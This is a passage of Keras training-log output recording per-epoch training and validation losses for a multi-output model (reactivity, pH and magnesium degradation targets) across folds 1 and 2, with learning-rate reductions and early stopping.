5.3053 - output_react_loss: 0.5975 - output_bg_ph_loss: 0.6579 - output_ph_loss: 0.8233 - output_mg_c_loss: 0.6250 - output_c_loss: 0.7213 - val_loss: 4.8023 - val_output_react_loss: 0.5606 - val_output_bg_ph_loss: 0.6868 - val_output_ph_loss: 0.6482 - val_output_mg_c_loss: 0.5583 - val_output_c_loss: 0.5427 Epoch 12/70 120/120 - 7s - loss: 5.5135 - output_react_loss: 0.6187 - output_bg_ph_loss: 0.6695 - output_ph_loss: 0.8676 - output_mg_c_loss: 0.6550 - output_c_loss: 0.7598 - val_loss: 4.7526 - val_output_react_loss: 0.5582 - val_output_bg_ph_loss: 0.6705 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5555 - val_output_c_loss: 0.5471 Epoch 13/70 120/120 - 7s - loss: 5.2029 - output_react_loss: 0.5775 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8221 - output_mg_c_loss: 0.6133 - output_c_loss: 0.7198 - val_loss: 4.7717 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6807 - val_output_ph_loss: 0.6389 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5438 Epoch 14/70 120/120 - 7s - loss: 5.2533 - output_react_loss: 0.5847 - output_bg_ph_loss: 0.6349 - output_ph_loss: 0.8446 - output_mg_c_loss: 0.6162 - output_c_loss: 0.7371 - val_loss: 4.7730 - val_output_react_loss: 0.5559 - val_output_bg_ph_loss: 0.6747 - val_output_ph_loss: 0.6340 - val_output_mg_c_loss: 0.5644 - val_output_c_loss: 0.5489 Epoch 15/70 120/120 - 7s - loss: 5.0608 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6109 - output_ph_loss: 0.8029 - output_mg_c_loss: 0.5952 - output_c_loss: 0.7100 - val_loss: 4.7315 - val_output_react_loss: 0.5479 - val_output_bg_ph_loss: 0.6692 - val_output_ph_loss: 0.6356 - val_output_mg_c_loss: 0.5578 - val_output_c_loss: 0.5461 Epoch 16/70 120/120 - 7s - loss: 5.0519 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6056 - output_ph_loss: 0.8057 - output_mg_c_loss: 0.5897 - output_c_loss: 0.7197 - val_loss: 4.7195 - val_output_react_loss: 0.5459 - val_output_bg_ph_loss: 0.6713 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5420 Epoch 17/70 120/120 - 7s - loss: 4.9197 - output_react_loss: 0.5442 - output_bg_ph_loss: 0.5949 - output_ph_loss: 0.7841 - output_mg_c_loss: 0.5771 - output_c_loss: 0.7033 - val_loss: 4.7081 - val_output_react_loss: 0.5398 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6330 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5494 Epoch 18/70 120/120 - 7s - loss: 4.8407 - output_react_loss: 0.5387 - output_bg_ph_loss: 0.5863 - output_ph_loss: 0.7697 - output_mg_c_loss: 0.5651 - output_c_loss: 0.6909 - val_loss: 4.7479 - val_output_react_loss: 0.5473 - val_output_bg_ph_loss: 0.6786 - val_output_ph_loss: 0.6390 - val_output_mg_c_loss: 0.5585 - val_output_c_loss: 0.5402 Epoch 19/70 120/120 - 7s - loss: 4.9427 - output_react_loss: 0.5432 - output_bg_ph_loss: 0.5823 - output_ph_loss: 0.8134 - output_mg_c_loss: 0.5743 - output_c_loss: 0.7299 - val_loss: 4.6847 - val_output_react_loss: 0.5418 - val_output_bg_ph_loss: 0.6676 - val_output_ph_loss: 0.6277 - val_output_mg_c_loss: 0.5495 - val_output_c_loss: 0.5391 Epoch 20/70 120/120 - 7s - loss: 4.7518 - output_react_loss: 0.5295 - output_bg_ph_loss: 0.5623 - output_ph_loss: 0.7691 - output_mg_c_loss: 0.5556 - output_c_loss: 0.6880 - val_loss: 4.6505 - val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6606 - val_output_ph_loss: 0.6247 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5354 Epoch 21/70 120/120 - 7s - loss: 4.5799 - output_react_loss: 0.5129 - output_bg_ph_loss: 0.5427 - output_ph_loss: 0.7412 - output_mg_c_loss: 0.5302 - output_c_loss: 0.6670 - val_loss: 4.6555 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6600 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5457 - val_output_c_loss: 0.5435 Epoch 22/70 120/120 - 7s - loss: 4.6793 - output_react_loss: 0.5103 - output_bg_ph_loss: 0.5511 - output_ph_loss: 0.7675 - output_mg_c_loss: 0.5492 - output_c_loss: 0.6907 - val_loss: 4.6583 - val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6578 - val_output_ph_loss: 0.6263 - val_output_mg_c_loss: 0.5486 - val_output_c_loss: 0.5399 Epoch 23/70 120/120 - 7s - loss: 4.7231 - output_react_loss: 0.5174 - output_bg_ph_loss: 0.5518 - output_ph_loss: 0.7815 - output_mg_c_loss: 0.5493 - output_c_loss: 0.7045 - val_loss: 4.6738 - val_output_react_loss: 0.5383 - val_output_bg_ph_loss: 0.6693 - val_output_ph_loss: 0.6249 - val_output_mg_c_loss: 0.5477 - val_output_c_loss: 0.5383 Epoch 24/70 120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4920 - output_bg_ph_loss: 0.5392 - output_ph_loss: 0.7414 - output_mg_c_loss: 0.5234 - output_c_loss: 0.6726 - val_loss: 4.7325 - val_output_react_loss: 0.5448 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6377 - val_output_mg_c_loss: 0.5582 - val_output_c_loss: 0.5427 Epoch 25/70 Epoch 00025: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.3904 - output_react_loss: 0.4821 - output_bg_ph_loss: 0.5178 - output_ph_loss: 0.7217 - output_mg_c_loss: 0.5074 - output_c_loss: 0.6540 - val_loss: 4.6522 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6223 - val_output_mg_c_loss: 0.5502 - val_output_c_loss: 0.5329 Epoch 26/70 120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5207 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5257 - output_c_loss: 0.6996 - val_loss: 4.5565 - val_output_react_loss: 0.5271 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5268 Epoch 27/70 120/120 - 7s - loss: 4.1334 - output_react_loss: 0.4538 - output_bg_ph_loss: 0.4856 - output_ph_loss: 0.6847 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6195 - val_loss: 4.5609 - val_output_react_loss: 0.5284 - val_output_bg_ph_loss: 0.6479 - val_output_ph_loss: 0.6152 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5270 Epoch 28/70 120/120 - 7s - loss: 4.2748 - output_react_loss: 0.4703 - output_bg_ph_loss: 0.4885 - output_ph_loss: 0.7147 - output_mg_c_loss: 0.4972 - output_c_loss: 0.6479 - val_loss: 4.5574 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6485 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5260 Epoch 29/70 120/120 - 7s - loss: 4.2394 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4884 - output_ph_loss: 0.7139 - output_mg_c_loss: 0.4878 - output_c_loss: 0.6537 - val_loss: 4.5584 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5334 - val_output_c_loss: 0.5274 Epoch 30/70 120/120 - 7s - loss: 4.2578 - output_react_loss: 0.4595 - output_bg_ph_loss: 0.4945 - output_ph_loss: 0.7195 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6493 - val_loss: 4.5614 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5275 Epoch 31/70 120/120 - 7s - loss: 4.3131 - output_react_loss: 0.4688 - output_bg_ph_loss: 0.4934 - output_ph_loss: 0.7268 - output_mg_c_loss: 0.4992 - output_c_loss: 0.6634 - val_loss: 4.5532 - val_output_react_loss: 0.5268 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5268 Epoch 32/70 120/120 - 7s - loss: 4.1724 - output_react_loss: 0.4482 - output_bg_ph_loss: 0.4822 - output_ph_loss: 0.7072 - output_mg_c_loss: 0.4776 - output_c_loss: 0.6491 - val_loss: 4.5556 - val_output_react_loss: 0.5283 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5266 Epoch 33/70 120/120 - 7s - loss: 4.0777 - output_react_loss: 0.4427 - output_bg_ph_loss: 0.4760 - output_ph_loss: 0.6814 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6219 - val_loss: 4.5641 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5273 Epoch 34/70 120/120 - 8s - loss: 4.2050 - output_react_loss: 0.4552 - output_bg_ph_loss: 0.4826 - output_ph_loss: 0.7076 - output_mg_c_loss: 0.4829 - output_c_loss: 0.6560 - val_loss: 4.5578 - val_output_react_loss: 0.5287 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5279 Epoch 35/70 120/120 - 7s - loss: 4.1196 - output_react_loss: 0.4479 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.6841 - output_mg_c_loss: 0.4790 - output_c_loss: 0.6326 - val_loss: 4.5642 - val_output_react_loss: 0.5291 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6141 - val_output_mg_c_loss: 0.5349 - val_output_c_loss: 0.5277 Epoch 36/70 Epoch 00036: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 7s - loss: 4.1539 - output_react_loss: 0.4543 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.6984 - output_mg_c_loss: 0.4783 - output_c_loss: 0.6424 - val_loss: 4.5608 - val_output_react_loss: 0.5286 - val_output_bg_ph_loss: 0.6470 - val_output_ph_loss: 0.6157 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5269 Epoch 37/70 120/120 - 7s - loss: 4.2010 - output_react_loss: 0.4513 - output_bg_ph_loss: 0.4825 - output_ph_loss: 0.7171 - output_mg_c_loss: 0.4820 - output_c_loss: 0.6524 - val_loss: 4.5544 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6467 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5266 Epoch 38/70 120/120 - 7s - loss: 4.0893 - output_react_loss: 0.4433 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.6860 - output_mg_c_loss: 0.4737 - output_c_loss: 0.6247 - val_loss: 4.5552 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6466 - val_output_ph_loss: 0.6138 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5267 Epoch 39/70 120/120 - 7s - loss: 4.1813 - output_react_loss: 0.4526 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7089 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6541 - val_loss: 4.5544 - val_output_react_loss: 0.5272 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5268 Epoch 40/70 120/120 - 7s - loss: 4.0733 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4701 - output_ph_loss: 0.6839 - output_mg_c_loss: 0.4650 - output_c_loss: 0.6399 - val_loss: 4.5556 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5272 Epoch 41/70 120/120 - 7s - loss: 4.0894 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.6876 - output_mg_c_loss: 0.4709 - output_c_loss: 0.6341 - val_loss: 4.5525 - val_output_react_loss: 0.5274 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5269 Epoch 42/70 120/120 - 8s - loss: 4.1918 - output_react_loss: 0.4541 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.4842 - output_c_loss: 0.6530 - val_loss: 4.5551 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6466 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5271 Epoch 43/70 120/120 - 7s - loss: 4.2285 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4855 - output_ph_loss: 0.7191 - output_mg_c_loss: 0.4849 - output_c_loss: 0.6492 - val_loss: 4.5543 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5270 Epoch 44/70 120/120 - 7s - loss: 3.9389 - output_react_loss: 0.4208 - output_bg_ph_loss: 0.4606 - output_ph_loss: 0.6573 - output_mg_c_loss: 0.4551 - output_c_loss: 0.6086 - val_loss: 4.5547 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5269 Epoch 45/70 120/120 - 7s - loss: 4.1721 - output_react_loss: 0.4503 - output_bg_ph_loss: 0.4780 - output_ph_loss: 0.7018 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6468 - val_loss: 4.5578 - val_output_react_loss: 0.5282 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5272 Epoch 46/70 Epoch 00046: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 120/120 - 7s - loss: 4.1766 - output_react_loss: 0.4501 - output_bg_ph_loss: 0.4758 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4777 - output_c_loss: 0.6573 - val_loss: 4.5556 - val_output_react_loss: 0.5279 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5269 Epoch 47/70 120/120 - 7s - loss: 4.1604 - output_react_loss: 0.4493 - output_bg_ph_loss: 0.4744 - output_ph_loss: 0.7118 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6509 - val_loss: 4.5541 - val_output_react_loss: 0.5278 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5268 Epoch 48/70 120/120 - 7s - loss: 4.1509 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4746 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4827 - output_c_loss: 0.6452 - val_loss: 4.5540 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269 Epoch 49/70 120/120 - 7s - loss: 4.1227 - output_react_loss: 0.4461 - output_bg_ph_loss: 0.4759 - output_ph_loss: 0.6962 - output_mg_c_loss: 0.4702 - output_c_loss: 0.6421 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5268 Epoch 50/70 120/120 - 7s - loss: 4.1497 - output_react_loss: 0.4514 - output_bg_ph_loss: 0.4761 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4794 - output_c_loss: 0.6394 - val_loss: 4.5538 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269 Epoch 51/70 Restoring model weights from the end of the best epoch. Epoch 00051: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07. 120/120 - 7s - loss: 4.0692 - output_react_loss: 0.4418 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6387 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5326 - val_output_c_loss: 0.5269 Epoch 00051: early stopping FOLD: 2 Epoch 1/70 120/120 - 9s - loss: 8.9128 - output_react_loss: 0.9383 - output_bg_ph_loss: 1.1704 - output_ph_loss: 1.3152 - output_mg_c_loss: 1.1295 - output_c_loss: 1.1212 - val_loss: 6.5853 - val_output_react_loss: 0.7624 - val_output_bg_ph_loss: 0.9432 - val_output_ph_loss: 0.8395 - val_output_mg_c_loss: 0.8012 - val_output_c_loss: 0.7321 Epoch 2/70 120/120 - 7s - loss: 7.5912 - output_react_loss: 0.8057 - output_bg_ph_loss: 0.9756 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9677 - output_c_loss: 0.9707 - val_loss: 5.9750 - val_output_react_loss: 0.6882 - val_output_bg_ph_loss: 0.8614 - val_output_ph_loss: 0.7744 - val_output_mg_c_loss: 0.7194 - val_output_c_loss: 0.6625 Epoch 3/70 120/120 - 7s - loss: 7.1064 - output_react_loss: 0.7623 - output_bg_ph_loss: 0.8993 - output_ph_loss: 1.0778 - output_mg_c_loss: 0.8766 - output_c_loss: 0.9522 - val_loss: 5.4677 - val_output_react_loss: 0.6513 - val_output_bg_ph_loss: 0.7812 - val_output_ph_loss: 0.7253 - val_output_mg_c_loss: 0.6417 - val_output_c_loss: 0.5941 Epoch 4/70 120/120 - 7s - loss: 6.7508 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8445 - output_ph_loss: 1.0186 - output_mg_c_loss: 0.8359 - output_c_loss: 0.8961 - val_loss: 5.1992 - val_output_react_loss: 0.6109 - val_output_bg_ph_loss: 0.7467 - val_output_ph_loss: 0.6903 - val_output_mg_c_loss: 0.6108 - val_output_c_loss: 0.5722 Epoch 5/70 120/120 - 7s - loss: 6.5375 - output_react_loss: 0.7160 - output_bg_ph_loss: 0.8198 - output_ph_loss: 0.9891 - output_mg_c_loss: 0.8013 - output_c_loss: 0.8744 - val_loss: 4.9895 - val_output_react_loss: 0.5965 - val_output_bg_ph_loss: 0.7124 - val_output_ph_loss: 0.6590 - val_output_mg_c_loss: 0.5759 - val_output_c_loss: 0.5609 Epoch 6/70 120/120 - 7s - loss: 6.2897 - output_react_loss: 0.6944 - output_bg_ph_loss: 0.7863 - output_ph_loss: 0.9586 - output_mg_c_loss: 0.7666 - output_c_loss: 0.8363 - val_loss: 4.8275 - val_output_react_loss: 0.5699 - val_output_bg_ph_loss: 0.6906 - val_output_ph_loss: 0.6425 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5416 Epoch 7/70 120/120 - 7s - loss: 6.1039 - output_react_loss: 0.6757 - output_bg_ph_loss: 0.7549 - output_ph_loss: 0.9339 - output_mg_c_loss: 0.7382 - output_c_loss: 0.8322 - val_loss: 4.8011 - val_output_react_loss: 0.5680 - val_output_bg_ph_loss: 0.6876 - val_output_ph_loss: 0.6410 - val_output_mg_c_loss: 0.5562 - val_output_c_loss: 0.5364 Epoch 8/70 120/120 - 7s - loss: 6.0208 - output_react_loss: 0.6756 - output_bg_ph_loss: 0.7429 - output_ph_loss: 0.9175 - output_mg_c_loss: 0.7260 - output_c_loss: 0.8144 - val_loss: 4.7141 - val_output_react_loss: 0.5520 - val_output_bg_ph_loss: 0.6756 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5310 Epoch 9/70 120/120 - 7s - loss: 5.6994 - output_react_loss: 0.6325 - output_bg_ph_loss: 0.7093 - output_ph_loss: 0.8825 - output_mg_c_loss: 0.6814 - output_c_loss: 0.7703 - val_loss: 4.6370 - val_output_react_loss: 0.5421 - val_output_bg_ph_loss: 0.6677 - val_output_ph_loss: 0.6186 - val_output_mg_c_loss: 0.5388 - val_output_c_loss: 0.5210 Epoch 10/70 120/120 - 7s - loss: 5.6689 - output_react_loss: 0.6333 - output_bg_ph_loss: 0.7009 - output_ph_loss: 0.8634 - output_mg_c_loss: 0.6764 - output_c_loss: 0.7843 - val_loss: 4.6090 - val_output_react_loss: 0.5307 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6181 - val_output_mg_c_loss: 0.5431 - val_output_c_loss: 0.5205 Epoch 11/70 120/120 - 7s - loss: 5.6520 - output_react_loss: 0.6270 - output_bg_ph_loss: 0.6931 - output_ph_loss: 0.8810 - output_mg_c_loss: 0.6780 - output_c_loss: 0.7747 - val_loss: 4.6214 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6075 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5131 Epoch 12/70 120/120 - 8s - loss: 5.4352 - output_react_loss: 0.6135 - output_bg_ph_loss: 0.6598 - output_ph_loss: 0.8373 - output_mg_c_loss: 0.6389 - output_c_loss: 0.7736 - val_loss: 4.5804 - val_output_react_loss: 0.5245 - val_output_bg_ph_loss: 0.6611 - val_output_ph_loss: 0.6115 - val_output_mg_c_loss: 0.5368 - val_output_c_loss: 0.5240 Epoch 13/70 120/120 - 7s - loss: 5.1948 - output_react_loss: 0.5789 - output_bg_ph_loss: 0.6361 - output_ph_loss: 0.8005 - output_mg_c_loss: 0.6193 - output_c_loss: 0.7260 - val_loss: 4.6597 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6780 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5512 - val_output_c_loss: 0.5173 Epoch 14/70 120/120 - 7s - loss: 5.2999 - output_react_loss: 0.5952 - output_bg_ph_loss: 0.6389 - output_ph_loss: 0.8436 - output_mg_c_loss: 0.6209 - output_c_loss: 0.7465 - val_loss: 4.5068 - val_output_react_loss: 0.5207 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6002 - val_output_mg_c_loss: 0.5245 - val_output_c_loss: 0.5112 Epoch 15/70 120/120 - 7s - loss: 5.1306 - output_react_loss: 0.5741 - output_bg_ph_loss: 0.6185 - output_ph_loss: 0.8090 - output_mg_c_loss: 0.6039 - output_c_loss: 0.7288 - val_loss: 4.5211 - val_output_react_loss: 0.5159 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6016 - val_output_mg_c_loss: 0.5362 - val_output_c_loss: 0.5062 Epoch 16/70 120/120 - 7s - loss: 5.1908 - output_react_loss: 0.5787 - output_bg_ph_loss: 0.6171 - output_ph_loss: 0.8378 - output_mg_c_loss: 0.6046 - output_c_loss: 0.7522 - val_loss: 4.4677 - val_output_react_loss: 0.5082 - val_output_bg_ph_loss: 0.6455 - val_output_ph_loss: 0.5972 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5101 Epoch 17/70 120/120 - 7s - loss: 4.8559 - output_react_loss: 0.5465 - output_bg_ph_loss: 0.5882 - output_ph_loss: 0.7376 - output_mg_c_loss: 0.5721 - output_c_loss: 0.7048 - val_loss: 4.5045 - val_output_react_loss: 0.5143 - val_output_bg_ph_loss: 0.6495 - val_output_ph_loss: 0.6043 - val_output_mg_c_loss: 0.5306 - val_output_c_loss: 0.5113 Epoch 18/70 120/120 - 7s - loss: 5.0255 - output_react_loss: 0.5594 - output_bg_ph_loss: 0.5926 - output_ph_loss: 0.8123 - output_mg_c_loss: 0.5886 - output_c_loss: 0.7321 - val_loss: 4.4435 - val_output_react_loss: 0.5030 - val_output_bg_ph_loss: 0.6454 - val_output_ph_loss: 0.5924 - val_output_mg_c_loss: 0.5227 - val_output_c_loss: 0.5090 Epoch 19/70 120/120 - 7s - loss: 4.7977 - output_react_loss: 0.5330 - output_bg_ph_loss: 0.5742 - output_ph_loss: 0.7592 - output_mg_c_loss: 0.5608 - output_c_loss: 0.7026 - val_loss: 4.4516 - val_output_react_loss: 0.5021 - val_output_bg_ph_loss: 0.6497 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5071 Epoch 20/70 120/120 - 8s - loss: 4.8366 - output_react_loss: 0.5339 - output_bg_ph_loss: 0.5719 - output_ph_loss: 0.7718 - output_mg_c_loss: 0.5682 - output_c_loss: 0.7168 - val_loss: 4.5308 - val_output_react_loss: 0.5117 - val_output_bg_ph_loss: 0.6645 - val_output_ph_loss: 0.6015 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5107 Epoch 21/70 120/120 - 7s - loss: 4.7086 - output_react_loss: 0.5245 - output_bg_ph_loss: 0.5567 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5511 - output_c_loss: 0.6912 - val_loss: 4.4813 - val_output_react_loss: 0.5113 - val_output_bg_ph_loss: 0.6490 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5102 Epoch 22/70 120/120 - 7s - loss: 4.6421 - output_react_loss: 0.5127 - output_bg_ph_loss: 0.5502 - output_ph_loss: 0.7402 - output_mg_c_loss: 0.5398 - output_c_loss: 0.6963 - val_loss: 4.4557 - val_output_react_loss: 0.5040 - val_output_bg_ph_loss: 0.6519 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5232 - val_output_c_loss: 0.5055 Epoch 23/70 120/120 - 7s - loss: 4.6514 - output_react_loss: 0.5118 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7576 - output_mg_c_loss: 0.5392 - output_c_loss: 0.6970 - val_loss: 4.4421 - val_output_react_loss: 0.5016 - val_output_bg_ph_loss: 0.6492 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5212 - val_output_c_loss: 0.5054 Epoch 24/70 120/120 - 7s - loss: 4.6099 - output_react_loss: 0.5030 - output_bg_ph_loss: 0.5386 - output_ph_loss: 0.7466 - output_mg_c_loss: 0.5384 - output_c_loss: 0.7033 - val_loss: 4.4646 - val_output_react_loss: 0.5075 - val_output_bg_ph_loss: 0.6508 - val_output_ph_loss: 0.5950 - val_output_mg_c_loss: 0.5218 - val_output_c_loss: 0.5094 Epoch 25/70 120/120 - 7s - loss: 4.6612 - output_react_loss: 0.5116 - output_bg_ph_loss: 0.5410 - output_ph_loss: 0.7671 - output_mg_c_loss: 0.5411 - output_c_loss: 0.7068 - val_loss: 4.4891 - val_output_react_loss: 0.5045 - val_output_bg_ph_loss: 0.6496 - val_output_ph_loss: 0.5954 - val_output_mg_c_loss: 0.5386 - val_output_c_loss: 0.5082 Epoch 26/70 120/120 - 7s - loss: 4.4395 - output_react_loss: 0.4891 - output_bg_ph_loss: 0.5246 - output_ph_loss: 0.7109 - output_mg_c_loss: 0.5179 - output_c_loss: 0.6654 - val_loss: 4.4417 - val_output_react_loss: 0.5011 - val_output_bg_ph_loss: 0.6438 - val_output_ph_loss: 0.5984 - val_output_mg_c_loss: 0.5237 - val_output_c_loss: 0.5061 Epoch 27/70 120/120 - 7s - loss: 4.5181 - output_react_loss: 0.4952 - output_bg_ph_loss: 0.5245 - output_ph_loss: 0.7437 - output_mg_c_loss: 0.5240 - output_c_loss: 0.6870 - val_loss: 4.4796 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6477 - val_output_ph_loss: 0.6034 - val_output_mg_c_loss: 0.5297 - val_output_c_loss: 0.5165 Epoch 28/70 120/120 - 7s - loss: 4.2343 - output_react_loss: 0.4702 - output_bg_ph_loss: 0.4963 - output_ph_loss: 0.6728 - output_mg_c_loss: 0.4927 - output_c_loss: 0.6430 - val_loss: 4.4593 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5952 - val_output_mg_c_loss: 0.5253 - val_output_c_loss: 0.5161 Epoch 29/70 120/120 - 7s - loss: 4.4013 - output_react_loss: 0.4723 - output_bg_ph_loss: 0.5051 - output_ph_loss: 0.7193 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6734 - val_loss: 4.4265 - val_output_react_loss: 0.4955 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5036 Epoch 30/70 120/120 - 7s - loss: 4.3896 - output_react_loss: 0.4825 - output_bg_ph_loss: 0.5062 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.5048 - output_c_loss: 0.6827 - val_loss: 4.4442 - val_output_react_loss: 0.5034 - val_output_bg_ph_loss: 0.6440 - val_output_ph_loss: 0.5901 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5084 Epoch 31/70 120/120 - 7s - loss: 4.4621 - output_react_loss: 0.4806 - output_bg_ph_loss: 0.5130 - output_ph_loss: 0.7569 - output_mg_c_loss: 0.5145 - output_c_loss: 0.6892 - val_loss: 4.4552 - val_output_react_loss: 0.5004 - val_output_bg_ph_loss: 0.6472 - val_output_ph_loss: 0.5983 - val_output_mg_c_loss: 0.5229 - val_output_c_loss: 0.5160 Epoch 32/70 120/120 - 7s - loss: 4.2475 - output_react_loss: 0.4605 - output_bg_ph_loss: 0.4863 - 